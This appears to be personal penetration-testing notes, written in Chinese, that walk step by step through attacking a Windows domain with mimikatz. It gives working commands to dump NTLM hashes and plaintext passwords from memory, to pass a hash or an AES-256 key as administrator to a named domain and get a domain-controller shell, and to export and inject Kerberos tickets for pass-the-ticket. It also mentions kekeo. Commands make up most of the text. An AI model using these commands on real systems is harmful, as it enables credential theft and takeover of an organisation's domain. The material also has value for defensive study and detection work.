(1)管理员运行
(2)必须输入
privilege::debug
(3)在目标主机使用mimikatz获取ntlm hash
winserver 2012R2 之前版本 可以获取到明文密码
sekurlsa::logonpasswords
(4) 哈希传递 将哈希值 传递到其他计算机上 进行登录域控验证
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /ntlm:d45400035583e3e53a63620875a6d043
mimikatz执行后 会弹出一个拥有对应 hash用户权限的 cmd窗口
可看到 弹出 域控的 cmd权限
(5) aes-256密钥
使用 mimikatz抓取密钥
sekurlsa::ekeys
获取到 aes-25后
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com /aes256:“aes256的值”
需要目标机器上安装 KB2871997补丁 安装了 该补丁后 ,就可以通过AES256密钥 进行哈希传递啦。
票据传递
privilege::debug
sekurlsa::tickets /export
执行该命令后 会在当前目录生成多个服务的票据文件 例如 kirbi等
使用以下命令 清楚 内存中的票据
kerberos::purge
将票据文件注入内存
kerberos::ptt “[0;4beae]-2-0-40e00000-Administrator@krbtgt-YXY.YOUTHBELIEF.COM.kirbi”
“文件名”
在当前终端 退出 mimikatz 然后就可以列出目标目录啦。
除了mimikatz工具 还可以用 kekeo传递票据。